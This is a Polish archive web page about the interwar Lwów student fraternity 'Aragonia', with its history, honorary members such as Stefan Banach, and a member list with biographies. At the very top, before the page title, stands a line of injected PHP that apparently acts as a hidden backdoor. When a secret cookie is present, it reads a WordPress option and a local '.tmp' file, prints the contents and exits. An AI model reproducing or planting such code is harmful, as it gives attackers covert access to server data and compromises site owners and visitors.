if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Aragonia

Dekiel Aragonii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Aragonia”
Siedziba:
Lwów
Data powstania:
12 IX 1925 r.
Barwy:
ciemnogranatowa – srebrna – niebieska
Dewiza:
„W jedności siła”

Rys historyczny

Listownik Aragonii, 1931 r.

Aragonia powstała w październiku 1925 r. Została założona przez studentów Uniwersytetu Jana Kazimierza, w większości słuchaczy Wydziału Prawa. Członkowie Aragonii w znacznej części wywodzili się z lwowskiej inteligencji.

Od 1927 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 15 XI 1926 r.). Kandydowała pod opieką K! Leopolia. Prawa członka rzeczywistego uzyskała dnia 2 I 1928 r.

Aragonia, Lwów 4 V 1929 r.

Kuratorem korporacji był m.in. prof. Stanisław Ruziewicz. Siedziby korporacji mieściły się: w początkowym okresie działalności przy ul. Św. Piotra i Pawła 11a, a ok. 1934 r. przy ul. Łyczakowskiej 5.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 75 nazwisk, w tym ośmiu członków honorowych.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków

Aragonia, uroczysta defilada z okazji Święta 3 Maja, Lwów 4 V 1929 r.

Lista członków

Poniższa, niekompletna lista członków Aragonii obejmuje 75 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Stefan Banach, (30 marca 1892 w Krakowie - 31 sierpnia 1945 we Lwowie) s. Stefana Greczka i Katarzyny Banach, uczeń i absolwent I Gimnazjum im. Bartłomieja Nowodworskiego w Krakowie 1902-10, półdyplom Wydział Inżynierii Lądowej PL, asystent w Katedrze Matematyki na Wydziale Mechanicznym PL, doktorat UJK 1920, habilitacja UJK 1922, od 1922 prof. nadzw. UJK, od 1927 prof. zw. UJK, od 1924 członek korespondent PAU, prezes Polskiego Towarzystwa Matematycznego 1939, Filister honorowy Aragonii i Aquitanii, po zajęciu Lwowa przez Rosjan prof. ULw. i dziekan Wydziału Matematyczno-Fizycznego, członek korespondent Akademii Nauk Ukraińskiej SRR, delegat do sowieckiej Rady Miejskiej Lwowa, w czasie okupacji niemieckiej m.in. wykładowca matematyki na Państwowych Technicznych Kursach Zawodowych 1942-44, po ponownym zajęciu Lwowa przez Rosjan prof. ULw., pochowany na Cmentarzu Łyczakowskim, w 1946 Polskie Towarzystwo Matematyczne ufundowało nagrodę naukową im. S. Banacha, w 1972 utworzono Międzynarodowe Centrum Matematyczne im. S. Banacha przy Instytucie Matematycznym PAN, autor ponad 60 prac naukowych i twórca wielu twierdzeń o fundamentalnym znaczeniu dla wielu działów matematyki, współtwórca z Hugo Steinhausem lwowskiej szkoły matematycznej
 2. Antoni Cieszyński, (1882 w Oleśnicy k. Wrocławia - 3/4 lipca 1941 we Lwowie) absolwent Gimnazjum w Bydgoszczy, studiował medycynę, stomatologię i filozofię w Berlinie i Monachium, od 1913 prof. nadzw. i kierownik Ambulatorium Dentystycznego (później Instytutu Dentystycznego, od 1930 Kliniki Stomatologicznej) Wydziału Lekarskiego ULw., dziekan Wydziału Lekarskiego 1927/28, Filister honorowy Aragonii, w czasie walk o Lwów w 1918 zorganizował Polską Służbę Sanitarną, aresztowany przez Niemców w nocy z 3 na 4 lipca 1941 i wraz z grupą 25 polskich profesorów uczelni Lwowa rozstrzelany na Wzgórzach Wuleckich, autor ok. 375 prac naukowych z dziedziny stomatologii, odznaczony m.in. Krzyżem Obrony Lwowa oraz Medalem Niepodległości
 3. Józef Hecht, ojciec Władysława (Aragonia), adwokat we Lwowie, Filister honorowy Aragonii
 4. Kazimierz Kwiatkowski, (?), prof. UJK, Filister honorowy Aragonii (?)
 5. Mieczyslaw Łazowski, mgr farmacji, właściciel apteki „Pod Orłem” przy ul. Gródeckiej we Lwowie, Filister honorowy Aragonii
 6. Antoni Michał Nowak-Przygodzki, (1897-1959) żołnierz Legionów Polskich, po kryzysie przysięgowym wcielony do armii austriackiej 1917, dowódca Legii Akademickiej w obronie Lwowa 1918-19, dr praw, adwokat we Lwowie, Filister honorowy Aragonii, w 1939 kierował Komitetem Opieki nad Uchodźcami, w czasie okupacji instruktor Szarych Szeregów na teren południowo-wschodniej Polski, od 1944 zastępca szefa, a następnie szef Biura Informacji i Propagandy, po upadku Powstania Warszawskiego więziony w niemieckich obozach jenieckich, po wojnie pozostał na emigracji, prezes Zarządu Głównego Stowarzyszenia Kombatantów Polskich 1947-48, wykładowca w polskiej Szkole Nauk Politycznych i Społecznych w Paryżu oraz Liceum Polskim w Les Ageux, kierownik studiów Polskiej Sekcji Międzynarodowego Uniwersytetu w Strasburgu
 7. Roman Henryk Rencki, (?) (19 lipca 1867 w Rzeszowie - 3/4 lipca 1941 we Lwowie) z rodziny chłopskiej, s. Jana Kamyka i Rozalii, w 1894 nazwisko Kamyk zmienił na Rencki, ojciec Lesława (Aragonia), absolwent Gimnazjum w Rzeszowie 1885, student i absolwent UJ 1885-93, dr med. 1894, internista, habilitacja ULw. 1902, od 1907 prof. nadzw. ULw., członek Generalnego Komitetu Pomocy dla Polski w Vevey 1914-15, od 1920 prof. zw. oraz kierownik I i II Kliniki Internistycznej UJK, dziekan Wydziału Lekarskiego 1924-26, autor wielu publikacji, w tym 15 książek, prezes Towarzystwa Lekarzy Galicyjskich 1922-39, członek-korespondent PAU 1924, prezes i członek honorowy Lwowskiego Towarzystwa Lekarskiego 1934, członek honorowy Towarzystwa w Lublinie i Częstochowie 1934, odznaczony m.in. Krzyżem Komandorskim Orderu Polonia Restituta 1938, Filister honorowy Aragonii (?), więziony przez Sowietów 1939-41, po rozpoczęciu wojny niemiecko-rosyjskiej zbiegł z więzienia, aresztowany wkrótce potem przez Niemców w nocy z 3 na 4 lipca 1941 i wraz z grupą 25 polskich profesorów uczelni Lwowa rozstrzelany na Wzgórzach Wuleckich [Źródła (poza wskazanymi poniżej spisu członków): relacja Christophera Renckiego]
 8. Stanisław Ruziewicz, (1889 w Po(d)stajach k. Kołomyi - 12 lipca 1941 we Lwowie) prof. matematyki UJK i PL, rektor Akademii Handlu Zagranicznego we Lwowie, przedstawiciel lwowskiej szkoły matematycznej, kurator i Filister honorowy Aragonii, aresztowany przez Gestapo 11 lipca 1941, następnego dnia rozstrzelany

Członkowie rzeczywiści

 1. Edmund Abrahamik, akt. 1925-30, wiceprezes 1927
 2. Stanisław Baran, ( - ok. 1985 w Krakowie) akt. 1935-39, mgr praw, pracownik NIK w Krakowie
 3. Roman Barszak, brat Tadeusza (Aragonia), mgr praw, prokurator
 4. Tadeusz Barszak, brat Romana (Aragonia), student i absolwent mechaniki PL
 5. Bielecki,
 6. Mieczysław Boss, mgr praw, starosta w Trembowli, po wojnie dyrektor departamentu w Ministerstwie Sprawiedliwości, później dyrektor administracyjny PW
 7. Władysław Burski,
 8. Władysław Czaykowski, inż. rolnik, wykładowca Wydziału Rolniczego PL w Dublanach, po wojnie prof. Akademii Rolniczej we Wrocławiu
 9. Władysław Czekajło, inż. mechanik
 10. Mikołaj Czwanianc, student med. UJK
 11. Marian Bolesław Garlicki, (8 grudnia 1908 w Drohobyczu - 23 maja 2002 w Warszawie) s. Stanisława i Zofii z Michnowiczów, absolwent Gimnazjum oo. Jezuitów w Chyrowie, student i absolwent med. UJK 1927-35, c. 1927, wiceprezes 1928/29, prezes 1932/33, ortopeda, w wojnie obronnej 1939 ordynator Oddziału Chirurgicznego Szpitala Wojennego we Lwowie, w czasie okupacji w AK, w 1944 powołany do LWP na ordynatora Oddziału Chirurgicznego 66 Szpitala Ewakuacyjnego, dr med. 1947, habilitacja 1951, od 1952 kierownik Kliniki Chirurgii Ortopedycznej Śląskiej AM, od 1954 prof. nadzw. i rektor Śląskiej AM 1954-57, poseł na Sejm PRL 1957-61, w 1957 powołany do czynnej służby wojskowej w stopniu pułkownika, naczelny chirurg LWP oraz kierownik naukowy Kliniki Ortopedyczno-Urazowej Szpitala MON, od 1958 gen. brygady, pierwszy komendant-rektor WAM w Łodzi 1958-65, krajowy konsultanta ds. ortopedii i traumatologii 1960-84, prof. zw. 1963, kierownik Katedry i Kliniki Ortopedycznej AM w Warszawie 1966-79, doktor honoris causa WAM 1973 oraz Śląskiej AM 1996, Filister honorowy Gasconii 1974, autor kilkudziesięciu prac naukowych, pochowany na Cmentarzu Wojskowym na Powązkach w Warszawie
 12. Andrzej Godowski, (15 kwietnia 1915 we Lwowie - 8 listopada 1977 w Londynie) student i absolwent prawa UJK, c. 1933 Slavia, akt. 1933-35, zwolniony z korporacji, wstąpił do Aragonii i przyczynił sie do odrodzenia korporacji wyprowadzając do niej grupę członków Młodzieży Wszechpolskiej, aresztowany i deportowany do łagrów, żołnierz II Korpusu PSZ, ciężko ranny pod Monte Cassino w 6 Lwowskim Batalionie Strzelców Karpackich, inwalida wojenny, po wojnie żył w angielskim wojskowym sanatorium dla inwalidów pod Londynem, odznaczony Krzyżem Walecznych
 13. Leon Walter Gołdyra, (14 września 1915 w Wiedniu - 30 października 1996 w Rzeszowie) s. Józefa i Józefy z d. Leopoldowa, brat Wiktora (Aragonia), absolwent gimnazjum we Lwowie 1933, student i absolwent 1937 prawa UJK, w czasie okupacji sowieckiej uczeń i absolwent Techników Handlowego 1940-41, w czasie okupacji niemieckiej pracownik Uniwersal Deutsche Handelgesschaft we Lwowie 1941-42, w 1943 przeniósł się do Generalnej Guberni, po wojnie pracował w Urzędzie Wojewódzkim w Rzeszowie, dyrektor Przemysłu Papierniczego 1948-51, radca prawny w Zakładach Mięsnych 1951-59, od 1959 do śmierci adwokat w Rzeszowie, pochowany w Rzeszowie
 14. Wiktor Alojzy Gołdyra, (5 września 1912 w Wiedniu - 20 grudnia 1993 we Wrocławiu) s. Józefa i Luizy z d. Leopoldowa, brat Waldemara (Aragonia), absolwent gimnazjum we Lwowie 1930, student i absolwent 1934 prawa UJK, w czasie okupacji pracował do 1943 w szkole, po wojnie radca prawny z Zakładach Mięsnych we Wrocławiu, wiceprezes Okręgowej Komisji Arbitrażowej we Wrocławiu 1949-1977, rzecznik patentowy, bezaprtyjny, pochowany na cmentarzu Świętej Rodziny we Wrocławiu
 15. Władysław Górski, mgr praw, bankowiec
 16. Tadeusz Grzebieniowski, inż. mechanik

  Leon Hanin, lata 30-te.

 17. Leon Henryk Hanin, (21 października 1909 we Lwowie - 14 czerwca 1969 we Wrocławiu) s. Leona i Katarzyny, od 1937 student Wydziału Chemicznego PL, po wojnie studiował i ukończył PŚ w Gliwicach 1946-49 i 1957-58 (inż. chemii), ofensywny prawy pomocnik Pogoni Lwów (1922-39), Dinama Lwów (1939-41) a po wojnie Polonii Bytom (1946-47), kierownik Kontroli Technicznej w Zakładach Wytwórczych Ogniw i Baterii “Volcie” we Wrocławiu, pochowany na Cmentarzu Św. Rodziny we Wrocławiu

 18. Bronisław Hanke, akt. 1931-32
 19. Karol Hanke, (6 września 1903 w Łodzi - 15 kwietnia 1964 w Warszawie) prawy pomocnik, grał w ŁKS 1920-24 i Pogoni Lwów 1924-31, dwukrotny mistrz Polski 1925 i 1926, reprezentant polski (9 meczów) 1924-28, student i absolwent 1934 med. UJK, sekretarz sem. zim. 1930/31, wiceprezes sem. let. 1930/31, prezes sem. zim. 1931/32, ginekolog-położnik, uczestnik powstania warszawskiego
 20. Władysław Hecht, s. Józefa (Aragonia), student i absolwent prawa UJK, sekretarz 1929, sem. let. 1929/30 oraz 1930/31
 21. Jerzy Horwath, założyciel Aragonii
 22. Franciszek Irauth, ( - maj 1944 w Drohobyczu) student i absolwent chemii PL, zginął od bomb alianckich podczas bombardowania rafinerii “Polminu” w Drohobyczu
 23. Kasprzyk, student PL
 24. Józef Kastner, student i absolwent prawa UJK, wiceprezes sem. zim. 1930/31
 25. Henryk Kirschläger,
 26. A. Korycki, sekretarz 1930
 27. Marian Król, założyciel Aragonii
 28. Krupa, prowadził własną orkiestrę taneczną
 29. Zdzisław Krysiński, założyciel Aragonii, mgr praw, adwokat
 30. Franciszek Kuczera, sekretarz sem. zim. 1931/32

  Czesław Lang, 1928 r.

 31. Czesław Lang, ( - 15 grudnia 1978) student i absolwent prawa UJK, założyciel Aragonii, prezes 1927 oraz 1929, olderman sem. let. 1929/30, komisarz VIII Zjazdu ZPKA we Lwowie, dr praw, adwokat

 32. Paweł Łasica, inż. budownictwa lądowego PL, pracował w administracji drogowej w Równem na Wołyniu, aresztowany przez NKWD i deportowany w głąb ZSRR, dalsze losy nieznane
 33. Wiesław Łasiński,
 34. Bronisław Łukasiewicz, ( - 1970) student i absolwent 1933 prawa UJK
 35. Mieczysław Machniewicz, akt. 1927-32, wiceprezes sem. let. 1929/30
 36. Bolesław Malskowski (Malkowski), mgr praw
 37. Kazimierz Mędrzecki, (1913 w Sosnowcu - ok. 1965 w Krakowie) student i absolwent 1938 budownictwa lądowego PL
 38. Tadeusz Murdzyński, założyciel Aragonii, po wojnie na emigracji w Wielkiej Brytanii
 39. Mieczysław Murzyński, student i absolwent mechaniki 1935 PL, c. 1929
 40. Pilecki,
 41. Adolf Bolesław Pokorny, (25 lutego 1906 w Nowym Siole - lata 90-te w Częstochowie) student i absolwent 1938 med. UJK, założyciel Aragonii, prezes sem. let. 1930/31, kierownik Wydziału Zdrowia i Poradni Przeciwgruźliczej w Częstochowie
 42. Józef Rastawiecki, założyciel Aragonii
 43. Stanisław Reithar, mgr filozofii
 44. Lesław Andrzej Rencki, (9 lipca 1907 we Lwowie - 10 lutego 1965 w Londynie) s. Romana (prof. med. UJK, Aragonia) i Pauli z d. Broda, absolwent gimnazjum we Lwowie, student i absolwent 1931 prawa UJK, założyciel Aragonii, olderman 1927, wiceprezes 1929, prezes sem. zim. 1930/31, działacz studencki, prokurent Banku Gospodarstwa Krajowego we Lwowie 1931-34, pracownik MSZ w Warszawie 1934-38, attache prasowy Ambasady RP w Belgradzie 1938-39, w 1940 przeniesiony do Stambułu, a później w Bejrucie 1941-48, od 1938 do 1948 w Służbie Wywiadowczej, w 1950 przeniósł się do Wielkiej Brytanii, pracował jako kierownik nocnej ochrony w Imperial College Uniwersytetu Londyńskiego 1960-65, pochowany na Cmentarzu Kensal Green w Londynie [Źródła (poza wskazanymi poniżej spisu członków): relacja Christophera Renckiego]
 45. Stanisław Rogowski, (1911 w Czortkowie - 1940 w Auschwitz) student AMW 1930/31, potem polonistyki UJK, c. 1930 Aragonia, ósmy założyciel i autor hymnu Slavii, olderman 1932, od 1936 w Warszawie, poeta, wydał dwa tomy wierszy, aresztowany wiosną 1940 przez Gestapo i zesłany do obozu koncentracyjnego Auschwitz, gdzie zginął
 46. Rudolf Rogoziński, założyciel Aragonii, pierwszy prezes sem. zim. 1925/26
 47. Skalski,
 48. Skibiński,
 49. Stelmachowicz, mgr praw, bankowiec
 50. Szarecki,
 51. Stanisław Toegel, mgr praw, karykaturzysta, po wojnie na emigracji w Wielkiej Brytanii
 52. Bogdan Tromszczyński, ( - 5 września 1939 w okolicach Rozprzy) inż. mech. PL, ppor. rez., poległ we wrześniu 1939 dowodząc 3 plutonem 2 komapnii 2 batalionu czołgów letnich
 53. Aleksander Udrycki, (1908 - 30 września 1989 w Katowicach) akt. 1928-37, sekretarz sem. let 1930/31, prezes 1933, olderman 1934, inż. chemik 1936, w PFZA w Mościcach, po wojnie ekspert budowy rafinerii (m.in. w Indiach)
 54. Jan Udrycki, (ok. 1909/10 - 2001) inż. budownictwa wodnego, budował zapory w Solinie, Porąbce
 55. Zenon Wasung, (1918 - ) mgr praw

  Andrzej Weigl, 1933 r.

 56. Andrzej Weigl, student PL

 57. Wejgel, lekarz med.
 58. Jerzy Wendeker, ( - 1939) student i absolwent mechaniki PL, c. 1929, starszy asystent Katedry Mechaniki, pchor. rez., w wojnie obronnej 1939 w 16 Dyonie Artylerii Motorowej w 10 Brygadzie Pancernej Stanisława Maczka, poległ w walkach
 59. Wesołowski, akt. 1925-30
 60. Jan Wolszlegier, (1903-1985) student i absolwent weterynarii AMW, c. 1927, dr med. weterynaryjnej 1932 (?)
 61. Tadeusz Zaleski, założyciel Aragonii, sekretarz 1927, olderman 1929, prezes sem. let. 1929/30
 62. Władysław Zaniewski,
 63. Ziarnecki, mgr praw
 64. Adolf Zimmer, ps. “Titek”, gracz Pogonii Lwów
 65. Aleksander Zopoth,
 66. Żukrowski, student prawa UJK, członek Zarządu Towarzystwa Biblioteki Słuchaczy Prawa 1927/28

Pieczeć Aragonii, 1931 r.

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Aragonia (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 74 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Aragonia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 IX 2010 r.
Ostatnia zmiana: 22 V 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Aragonia”, (na:) www.archiwumkorporacyjne.pl, stan 22 V 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }